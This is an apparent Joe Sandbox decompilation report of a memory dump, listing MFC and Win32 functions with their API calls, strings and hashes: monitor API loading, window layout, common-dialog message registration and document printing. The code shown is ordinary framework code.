Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
String ID: DllGetVersion
API String ID: 257281507-2861820592
Opcode ID: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
Instruction ID: 6de00a9f57abe9814b0481798e49b421408311c8e62ebcc167af93806f14bb4d
Opcode Fuzzy Hash: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
Instruction Fuzzy Hash: 8441D671640204FFDB219FA4DC88AAF3BB5FF48350B54802AF90597261D7349A56DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD2, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DD2() {
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				intOrPtr _t11;
				struct HINSTANCE__* _t15;
				intOrPtr _t17;
				_Unknown_base(*)()* _t18;

				_t17 =  *0x439620; // 0x0
				if(_t17 == 0) {
					_t15 = GetModuleHandleA("USER32");
					if(_t15 == 0) {
						L10:
						 *0x439608 = 0;
						 *0x43960c = 0;
						 *0x439610 = 0;
						 *0x439614 = 0;
						 *0x439618 = 0;
						 *0x43961c = 0;
						 *0x439620 = 1;
						return 0;
					}
					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
					 *0x439608 = _t5;
					if(_t5 == 0) {
						goto L10;
					}
					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
					 *0x43960c = _t6;
					if(_t6 == 0) {
						goto L10;
					}
					_t7 = GetProcAddress(_t15, "MonitorFromRect");
					 *0x439610 = _t7;
					if(_t7 == 0) {
						goto L10;
					}
					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
					 *0x439614 = _t8;
					if(_t8 == 0) {
						goto L10;
					}
					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
					 *0x43961c = _t9;
					if(_t9 == 0) {
						goto L10;
					}
					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
					 *0x439618 = _t10;
					if(_t10 == 0) {
						goto L10;
					}
					_t11 = 1;
					 *0x439620 = _t11;
					return _t11;
				}
				_t18 =  *0x439618; // 0x0
				return 0 | _t18 != 0x00000000;
			}

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,00404F0B), ref: 00404DF4
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00404E0C
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00404E1D
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00404E2E
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00404E3F
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00404E50
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00404E61

Strings

USER32, xrefs: 00404DEF
GetMonitorInfoA, xrefs: 00404E5B
MonitorFromPoint, xrefs: 00404E39
MonitorFromRect, xrefs: 00404E28
MonitorFromWindow, xrefs: 00404E17
GetSystemMetrics, xrefs: 00404E06
EnumDisplayMonitors, xrefs: 00404E4A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
Instruction ID: 29823efdfea0b27d0eaeb5a685ee6fdb8badc97bb1bd0a8226dd1226ed208354
Opcode Fuzzy Hash: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
Instruction Fuzzy Hash: 081124B0A02610EAC711DF35ECD296FBAA4B7887643A4A53FD114E2290D7BC4941CBED

Uniqueness

Uniqueness Score: -1.00%

Function 0042204B, Relevance: 24.2, APIs: 16, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042204B(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v0;
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _t59;
				int _t61;
				int _t65;
				struct HWND__* _t74;
				struct HWND__* _t79;
				struct HMENU__* _t81;
				struct HWND__* _t84;
				struct HWND__* _t88;
				signed int _t90;
				signed int _t91;
				struct HMENU__* _t103;
				intOrPtr* _t106;
				int _t108;
				intOrPtr* _t117;
				int* _t118;
				intOrPtr* _t119;
				struct HWND__* _t120;

				_t119 = __ecx;
				_t59 =  *((intOrPtr*)( *__ecx + 0xc0))();
				_t103 = 0;
				_v4 = _t59;
				if(_a4 != 0) {
					_t117 =  *((intOrPtr*)(_t59 + 0x68));
					if(_t117 != 0) {
						 *((intOrPtr*)( *_t117 + 0x5c))(0);
					}
				}
				_t120 =  *(_t119 + 0x70);
				_t118 = _a8;
				_v12 = _t103;
				if(_t120 == _t103) {
					L13:
					_t118[2] = _v12;
					if(_a4 == _t103) {
						 *(_t119 + 0x9c) = _t103;
						_t61 = GetDlgItem( *(_t119 + 0x1c), 0xea21);
						__eflags = _t61;
						_a4 = _t61;
						if(_t61 != 0) {
							_t74 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
							__eflags = _t74;
							if(_t74 != 0) {
								SetWindowLongA(_t74, 0xfffffff4, 0xea21);
							}
							SetWindowLongA(_a4, 0xfffffff4, 0xe900);
						}
						__eflags = _t118[1];
						if(_t118[1] != 0) {
							InvalidateRect( *(_t119 + 0x1c), 0, 1);
							SetMenu( *(_t119 + 0x1c), _t118[1]);
						}
						_t108 =  *(_v4 + 0x68);
						__eflags = _t108;
						if(_t108 != 0) {
							 *((intOrPtr*)( *_t108 + 0x5c))(1);
						}
						 *((intOrPtr*)( *_t119 + 0xc8))(1);
						_t65 =  *_t118;
						__eflags = _t65 - 0xe900;
						if(_t65 != 0xe900) {
							_v0 = GetDlgItem( *(_t119 + 0x1c), _t65);
						}
						ShowWindow(_v0, 5);
						 *(_t119 + 0x48) = _t118[5];
						return E00420A8B(1);
					}
					 *(_t119 + 0x9c) = _t118[4];
					E00420A8B(_t103);
					_t79 = GetDlgItem( *(_t119 + 0x1c),  *_t118);
					_v0 = _t79;
					ShowWindow(_t79, _t103);
					_t81 = GetMenu( *(_t119 + 0x1c));
					_t118[1] = _t81;
					if(_t81 != _t103) {
						InvalidateRect( *(_t119 + 0x1c), _t103, 1);
						SetMenu( *(_t119 + 0x1c), _t103);
						 *(_t119 + 0xb8) =  *(_t119 + 0xb8) & 0xfffffffe;
					}
					_t118[5] =  *(_t119 + 0x48);
					 *(_t119 + 0x48) = _t103;
					E0042065C(_t119, 0x7915);
					if( *_t118 == 0xe900) {
						_t84 = _a4;
					} else {
						_t84 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
					}
					if(_t84 == 0) {
						return _t84;
					} else {
						return SetWindowLongA(_t84, 0xfffffff4, 0xea21);
					}
				} else {
					goto L4;
				}
				do {
					L4:
					_t88 = _t120;
					_t120 = _v0;
					_t106 =  *((intOrPtr*)(_t88 + 8));
					_t90 = GetDlgCtrlID( *(_t106 + 0x1c)) & 0x0000ffff;
					_v8 = _t90;
					if(_t90 >= 0xe800 && _t90 <= 0xe81f) {
						_t91 = 1;
						_a8 = _t91 << _t90 - 0xe800;
						if( *((intOrPtr*)( *_t106 + 0xc8))() != 0) {
							_v12 = _v12 | _a8;
						}
						if( *((intOrPtr*)( *_t106 + 0xd0))() == 0 || _v8 != 0xe81f) {
							E00421741(_t118[2] & _a8, _t106, _t118[2] & _a8, 1);
						}
					}
				} while (_t120 != 0);
				_t103 = 0;
				goto L13;
			}

APIs

GetDlgCtrlID.USER32 ref: 0042208F
GetDlgItem.USER32 ref: 0042212C
ShowWindow.USER32(00000000,00000000), ref: 00422134
GetMenu.USER32(?), ref: 0042213D
InvalidateRect.USER32(?,00000000,00000001), ref: 00422150
SetMenu.USER32(?,00000000), ref: 0042215A
GetDlgItem.USER32 ref: 00422189
SetWindowLongA.USER32 ref: 004221A1
GetDlgItem.USER32 ref: 004221C0
GetDlgItem.USER32 ref: 004221D3
SetWindowLongA.USER32 ref: 004221E1
SetWindowLongA.USER32 ref: 004221EE
InvalidateRect.USER32(?,00000000,00000001), ref: 00422201
SetMenu.USER32(?,00000000), ref: 0042220D
GetDlgItem.USER32 ref: 0042223B
ShowWindow.USER32(?,00000005), ref: 00422247

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
String ID:
API String ID: 461998371-0
Opcode ID: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
Instruction ID: 11e971c61f50c2e3f40baeddfbca8ed65bc2cf00756bcc02c89e332112038adb
Opcode Fuzzy Hash: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
Instruction Fuzzy Hash: D4617D30700311AFD7209F64EC88A2ABBF4FF48304F504A2EF656972A1CB75E855CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004107DB, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 114
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004107DB(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* _t32;
				signed int _t34;
				void* _t40;
				int _t49;
				signed int _t58;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t64 = E00425C92(0x4397cc, E0042440D);
				_t54 =  *(_t64 + 0x18);
				if( *(_t64 + 0x18) != 0) {
					E00416433(_t54, _a4);
					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				}
				_t63 = _a8;
				if(_t63 != 0x110) {
					__eflags = _t63 -  *0x439cb0; // 0x0
					if(__eflags == 0) {
						L22:
						SendMessageA(_a4, 0x111, 0xe146, 0);
						_t32 = 1;
						return _t32;
					}
					__eflags = _t63 - 0x111;
					if(_t63 != 0x111) {
						L8:
						__eflags = _t63 - 0xc000;
						if(_t63 < 0xc000) {
							goto L19;
						}
						_push(_a4);
						_t65 = E00413767();
						_t34 = E00416753(_t65, 0x42e898);
						__eflags = _t34;
						if(_t34 == 0) {
							L11:
							__eflags = _t63 -  *0x439cbc; // 0x0
							if(__eflags != 0) {
								__eflags = _t63 -  *0x439cb8; // 0x0
								if(__eflags != 0) {
									__eflags = _t63 -  *0x439cc0; // 0x0
									if(__eflags != 0) {
										__eflags = _t63 -  *0x439cb4; // 0x0
										if(__eflags != 0) {
											goto L19;
										}
										return  *((intOrPtr*)( *_t65 + 0xd0))();
									}
									_t58 = _a16 >> 0x10;
									__eflags = _t58;
									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
									goto L19;
								}
								__eflags =  *0x439c3c;
								if( *0x439c3c != 0) {
									 *(_t65 + 0x1f4) = _a16;
								}
								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
								return _t40;
							}
							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
						}
						__eflags =  *(_t65 + 0x92) & 0x00000008;
						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
							goto L19;
						}
						goto L11;
					}
					__eflags = _a12 - 0x40e;
					if(_a12 == 0x40e) {
						goto L22;
					}
					goto L8;
				} else {
					 *0x439cc0 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
					 *0x439cbc = RegisterWindowMessageA("commdlg_ShareViolation");
					 *0x439cb8 = RegisterWindowMessageA("commdlg_FileNameOK");
					 *0x439cb4 = RegisterWindowMessageA("commdlg_ColorOK");
					 *0x439cb0 = RegisterWindowMessageA("commdlg_help");
					_t49 = RegisterWindowMessageA("commdlg_SetRGBColor");
					_push(_a16);
					 *0x439cac = _t49;
					_push(_a12);
					return E00411B77(_t54, _a4, 0x110);
				}
			}

APIs

Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1

RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_0002440D), ref: 00410826
RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 00410832
RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 0041083E
RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 0041084A
RegisterWindowMessageA.USER32(commdlg_help), ref: 00410856
RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 00410862

Part of subcall function 00416433: SetWindowLongA.USER32 ref: 00416462

SendMessageA.USER32 ref: 00410955

Strings

commdlg_FileNameOK, xrefs: 00410834
commdlg_help, xrefs: 0041084C
commdlg_SetRGBColor, xrefs: 00410858
commdlg_ShareViolation, xrefs: 00410828
commdlg_ColorOK, xrefs: 00410840
commdlg_LBSelChangedNotify, xrefs: 00410821

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageWindow$Register$LongSendValue
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 2377901579-3888057576
Opcode ID: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
Instruction ID: 0c99fb2fb3094324f535d28c6dff1db6175635640ea54eadaac3d4f9a63322fb
Opcode Fuzzy Hash: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
Instruction Fuzzy Hash: B041AFB1704214ABDF24AF29DD54BAE3BA1EB00754F11542BF405972A2CBB99CC0CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00428103, Relevance: 21.5, APIs: 14, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00428103(intOrPtr* __ecx, void* __eflags) {
				void* __ebx;
				signed int _t227;
				void* _t228;
				CHAR* _t229;
				intOrPtr _t231;
				CHAR* _t232;
				signed int _t233;
				CHAR* _t242;
				CHAR* _t243;
				CHAR* _t253;
				intOrPtr* _t256;
				intOrPtr _t265;
				signed char _t266;
				intOrPtr _t268;
				int _t290;
				int _t296;
				signed int _t300;
				int _t310;
				void* _t323;
				void* _t335;
				void* _t337;
				intOrPtr _t353;
				struct HDC__* _t355;
				intOrPtr _t357;
				signed char _t383;
				void* _t396;
				signed int _t449;
				intOrPtr* _t452;
				intOrPtr* _t455;
				struct _DOCINFOA _t458;
				void* _t460;
				signed char _t461;
				void* _t463;
				void* _t465;
				void* _t466;
				void* _t468;

				E00406520(E0042A280, _t463);
				_t466 = _t465 - 0x32c;
				_t452 = __ecx;
				 *((intOrPtr*)(_t463 - 0x24)) = __ecx;
				E00428824(_t463 - 0x80);
				 *(_t463 - 4) = 0;
				if( *((short*)(E00413672() + 8)) != 0xe108) {
					L6:
					_t227 =  *((intOrPtr*)( *_t452 + 0xf4))(_t463 - 0x80);
					__eflags = _t227;
					if(_t227 != 0) {
						_t229 =  *0x436980; // 0x436994
						 *(_t463 - 0x3c) = _t229;
						 *(_t463 - 4) = 1;
						_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						__eflags =  *(_t231 + 0x14) & 0x00000020;
						if(( *(_t231 + 0x14) & 0x00000020) == 0) {
							L12:
							_t232 =  *0x436980; // 0x436994
							 *(_t463 - 0x14) = _t232;
							_t233 =  *(_t452 + 0x3c);
							 *(_t463 - 4) = 0xa;
							__eflags = _t233;
							if(_t233 == 0) {
								E004140EE(E00414C6C(_t452), _t463 - 0x14);
							} else {
								E00416B95(_t463 - 0x14, _t463, _t233 + 0x1c);
							}
							__eflags =  *((intOrPtr*)( *(_t463 - 0x14) - 8)) - 0x1f;
							if(__eflags > 0) {
								E00416D10(_t463 - 0x14, __eflags, 0x1f);
							}
							_t458 = 0x14;
							E00406330(_t463 - 0x94, 0, _t458);
							_t468 = _t466 + 0xc;
							 *(_t463 - 0x90) =  *(_t463 - 0x14);
							_t242 =  *0x436980; // 0x436994
							 *(_t463 - 0x94) = _t458;
							 *(_t463 - 0x38) = _t242;
							_t243 =  *(_t463 - 0x3c);
							 *(_t463 - 4) = 0xb;
							__eflags =  *(_t243 - 8);
							if( *(_t243 - 8) != 0) {
								 *(_t463 - 0x8c) = _t243;
								E00417CBF(_t243, E00416CC1(_t463 - 0x38, _t463, 0x104), 0x104);
								_t460 = 0xf049;
							} else {
								 *(_t463 - 0x8c) = 0;
								_t323 = E004102D0( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
								 *(_t463 - 4) = 0xc;
								E00416B95(_t463 - 0x38, _t463, _t323);
								 *(_t463 - 4) = 0xb;
								E00416AEC(_t463 - 0x18);
								_t460 = 0xf040;
							}
							E00419B00(_t463 - 0x34);
							__eflags =  *(_t463 - 0x7c);
							 *(_t463 - 4) = 0xd;
							if( *(_t463 - 0x7c) == 0) {
								E00419BB7(_t463 - 0x34,  *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10));
								 *(_t463 - 0x28) = 1;
							}
							 *((intOrPtr*)( *_t452 + 0xf8))(_t463 - 0x34, _t463 - 0x80);
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) == 0) {
								SetAbortProc( *(_t463 - 0x30), E00427F7F);
							}
							E004166CE(E00404DAE(), 0);
							_push(_t452);
							E00428772(_t463 - 0xf0, __eflags);
							_t253 =  *0x436980; // 0x436994
							 *(_t463 - 0x20) = _t253;
							 *(_t463 - 4) = 0xf;
							E004164C6(_t463 - 0xf0, 0xc9,  *(_t463 - 0x14));
							_t256 = E00410292( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
							 *(_t463 - 4) = 0x10;
							E004164C6(_t463 - 0xf0, 0xca,  *_t256);
							 *(_t463 - 4) = 0xf;
							E00416AEC(_t463 - 0x18);
							E0041E3FA(_t463 - 0x20, _t460,  *(_t463 - 0x38));
							E004164C6(_t463 - 0xf0, 0xcb,  *(_t463 - 0x20));
							E0041668C(_t463 - 0xf0, 5);
							UpdateWindow( *(_t463 - 0xd4));
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								L27:
								_t265 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
								_t449 =  *(_t265 + 0x1a) & 0x0000ffff;
								_t383 =  *(_t265 + 0x1c) & 0x0000ffff;
								_t461 =  *(_t265 + 0x18) & 0x0000ffff;
								__eflags = _t449 - _t383;
								 *(_t463 - 0x10) = _t449;
								if(_t449 < _t383) {
									 *(_t463 - 0x10) = _t383;
								}
								_t266 =  *(_t265 + 0x1e) & 0x0000ffff;
								__eflags =  *(_t463 - 0x10) - _t266;
								if( *(_t463 - 0x10) > _t266) {
									 *(_t463 - 0x10) = _t266;
								}
								__eflags = _t461 - _t383;
								if(_t461 < _t383) {
									_t461 = _t383;
								}
								__eflags = _t461 - _t266;
								if(_t461 > _t266) {
									_t461 = _t266;
								}
								__eflags =  *(_t463 - 0x10) - _t461;
								asm("sbb eax, eax");
								_t268 = (_t266 & 0x000000fe) + 1;
								__eflags =  *(_t463 - 0x10) - 0xffff;
								 *((intOrPtr*)(_t463 - 0x18)) = _t268;
								if(__eflags != 0) {
									_t151 = _t463 - 0x10;
									 *_t151 =  *(_t463 - 0x10) + _t268;
									__eflags =  *_t151;
								} else {
									 *(_t463 - 0x10) = 0xffff;
								}
								E00417214(_t463 - 0x20, __eflags, 0xf043);
								__eflags =  *(_t463 - 0x7c);
								 *(_t463 - 0x1c) = 0;
								if( *(_t463 - 0x7c) == 0) {
									__eflags = _t461 -  *(_t463 - 0x10);
									 *(_t463 - 0x6c) = _t461;
									if(_t461 ==  *(_t463 - 0x10)) {
										goto L53;
									} else {
										while(1) {
											 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
											__eflags =  *(_t463 - 0x70);
											if( *(_t463 - 0x70) == 0) {
												goto L51;
											}
											wsprintfA(_t463 - 0x140,  *(_t463 - 0x20),  *(_t463 - 0x6c));
											_t468 = _t468 + 0xc;
											E004164C6(_t463 - 0xf0, 0xcc, _t463 - 0x140);
											_t290 = GetDeviceCaps( *(_t463 - 0x2c), 0xa);
											SetRect(_t463 - 0x5c, 0, 0, GetDeviceCaps( *(_t463 - 0x2c), 8), _t290);
											DPtoLP( *(_t463 - 0x2c), _t463 - 0x5c, 2);
											_t296 = StartPage( *(_t463 - 0x30));
											__eflags = _t296;
											if(_t296 < 0) {
												L50:
												_t452 =  *((intOrPtr*)(_t463 - 0x24));
												 *(_t463 - 0x1c) = 1;
											} else {
												__eflags =  *0x439c48; // 0x1
												_t455 =  *((intOrPtr*)(_t463 - 0x24));
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t455 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
												}
												 *((intOrPtr*)( *_t455 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
												__eflags = EndPage( *(_t463 - 0x30));
												if(__eflags < 0) {
													goto L50;
												} else {
													_t300 = E00427F7F(__eflags,  *(_t463 - 0x30), 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L50;
													} else {
														_t452 =  *((intOrPtr*)(_t463 - 0x24));
														 *(_t463 - 0x6c) =  *(_t463 - 0x6c) +  *((intOrPtr*)(_t463 - 0x18));
														__eflags =  *(_t463 - 0x6c) -  *(_t463 - 0x10);
														if( *(_t463 - 0x6c) !=  *(_t463 - 0x10)) {
															continue;
														} else {
														}
													}
												}
											}
											goto L51;
										}
										goto L51;
									}
								} else {
									 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
									 *((intOrPtr*)( *_t452 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
									L51:
									__eflags =  *(_t463 - 0x7c);
									if( *(_t463 - 0x7c) == 0) {
										__eflags =  *(_t463 - 0x1c);
										if( *(_t463 - 0x1c) != 0) {
											AbortDoc( *(_t463 - 0x30));
										} else {
											L53:
											EndDoc( *(_t463 - 0x30));
										}
									}
								}
								E004166CE(E00404DAE(), 1);
								 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
								E00413F6F(_t463 - 0xf0);
								E00419BEE(_t463 - 0x34);
							} else {
								_t310 = StartDocA( *(_t463 - 0x30), _t463 - 0x94);
								__eflags = _t310 - 0xffffffff;
								if(_t310 != 0xffffffff) {
									goto L27;
								} else {
									E004166CE(E00404DAE(), 1);
									 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
									E00413F6F(_t463 - 0xf0);
									E00419BEE(_t463 - 0x34);
									_push(0xffffffff);
									_push(0);
									_push(0xf106);
									E0041BB7E(_t463 - 0x34, __eflags);
								}
							}
							 *(_t463 - 4) = 0xe;
							E00416AEC(_t463 - 0x20);
							 *(_t463 - 4) = 0xd;
							 *((intOrPtr*)(_t463 - 0xf0)) = 0x42cb34;
							E00411D13(_t463 - 0xf0);
							 *(_t463 - 4) = 0xb;
							E00419C1F(_t463 - 0x34);
							 *(_t463 - 4) = 0xa;
							E00416AEC(_t463 - 0x38);
							 *(_t463 - 4) = 1;
							_t396 = _t463 - 0x14;
						} else {
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								goto L12;
							} else {
								E00416B16(_t463 - 0x1c, _t463, 0xf045);
								 *(_t463 - 4) = 2;
								E00416B16(_t463 - 0x40, _t463, 0xf046);
								 *(_t463 - 4) = 3;
								E00416B16(_t463 - 0x44, _t463, 0xf047);
								 *(_t463 - 4) = 4;
								E00416B16(_t463 - 0x10, _t463, 0xf048);
								_push(0);
								_push( *((intOrPtr*)(_t463 - 0x44)));
								 *(_t463 - 4) = 5;
								_push(6);
								_push( *((intOrPtr*)(_t463 - 0x40)));
								_push( *(_t463 - 0x1c));
								_push(0);
								E00410385(_t463 - 0x338);
								 *(_t463 - 4) = 6;
								 *(_t463 - 0x2ac) =  *(_t463 - 0x10);
								_t335 = E004104E7(0);
								__eflags = _t335 - 1;
								if(_t335 == 1) {
									_push(_t463 - 0x18);
									_t337 = E004105C2(_t463 - 0x338);
									 *(_t463 - 4) = 8;
									E00416B95(_t463 - 0x3c, _t463, _t337);
									 *(_t463 - 4) = 6;
									E00416AEC(_t463 - 0x18);
									 *(_t463 - 4) = 9;
									E00416AEC(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00411D13(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00416AEC(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00416AEC(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00416AEC(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									E00416AEC(_t463 - 0x1c);
									goto L12;
								} else {
									 *(_t463 - 4) = 7;
									E00416AEC(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00411D13(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00416AEC(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00416AEC(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00416AEC(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									_t396 = _t463 - 0x1c;
								}
							}
						}
						E00416AEC(_t396);
						 *(_t463 - 4) = 0;
						E00416AEC(_t463 - 0x3c);
					}
				} else {
					_t353 =  *((intOrPtr*)( *((intOrPtr*)(E00424BFB() + 4)) + 0xac));
					if(_t353 == 0 ||  *((intOrPtr*)(_t353 + 0x10)) != 3) {
						L5:
						 *(_t463 - 0x74) = 1;
						goto L6;
					} else {
						_t355 = CreateDCA( *(_t353 + 0x1c),  *(_t353 + 0x18),  *(_t353 + 0x20), 0);
						_t448 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						 *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10) = _t355;
						_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						_t473 =  *((intOrPtr*)(_t357 + 0x10));
						if( *((intOrPtr*)(_t357 + 0x10)) != 0) {
							goto L5;
						} else {
							_push(0xffffffff);
							_push(0);
							_push(0xf106);
							E0041BB7E(_t448, _t473);
						}
					}
				}
				 *(_t463 - 4) =  *(_t463 - 4) | 0xffffffff;
				_t228 = E004288AC(_t463 - 0x80);
				 *[fs:0x0] =  *((intOrPtr*)(_t463 - 0xc));
				return _t228;
			}

APIs

__EH_prolog.LIBCMT ref: 00428108

Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829

Part of subcall function 00413672: GetMessageTime.USER32(Function_0002440D), ref: 00413684
Part of subcall function 00413672: GetMessagePos.USER32 ref: 0041368D

CreateDCA.GDI32(?,?,?,00000000), ref: 0042815A
SetAbortProc.GDI32(?,Function_00027F7F), ref: 00428421
UpdateWindow.USER32(?), ref: 004284C0
StartDocA.GDI32(?,?), ref: 004284D5
EndDoc.GDI32(?), ref: 004286BF

Part of subcall function 0041BB7E: __EH_prolog.LIBCMT ref: 0041BB83

Memory Dump Source

